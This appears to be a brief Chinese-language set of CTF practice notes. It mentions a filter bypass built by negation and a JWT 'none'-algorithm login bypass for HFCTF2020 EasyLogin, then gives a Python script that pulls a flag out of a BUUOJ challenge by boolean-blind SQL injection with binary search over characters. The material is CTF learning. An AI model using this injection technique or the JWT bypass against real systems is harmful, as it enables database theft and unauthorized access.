做了一半做不动了,换个时间来,花费了很多时间,不过会构造取反绕过了也不错
一开始以为是seesion伪造,发现我做错了,然后还加了转义字符,不知道怎么做了,看了别人的WP,也就是加密算法改为none绕过 [HFCTF2020]EasyLogin [HFCTF2020]EasyLogin
不算太难
import requests import time url = "http://b8c664e5-963f-4117-9a97-9ba6567e2a49.node3.buuoj.cn/index.php" result = '' i = 0 while True: i = i + 1 head = 32 tail = 127 while head < tail: mid = (head + tail) >> 1 payload = { 'id': f'0^if(ascii(substr((select(flag)from(flag)),({i}),(1)))>{mid},1,0)' } r = requests.post(url,data=payload) print(r.text) if "glzjin wants a girlfriend" in r.text: head = mid + 1 else: tail = mid time.sleep(0.2) if head != 32: result += chr(head) else: break print(result)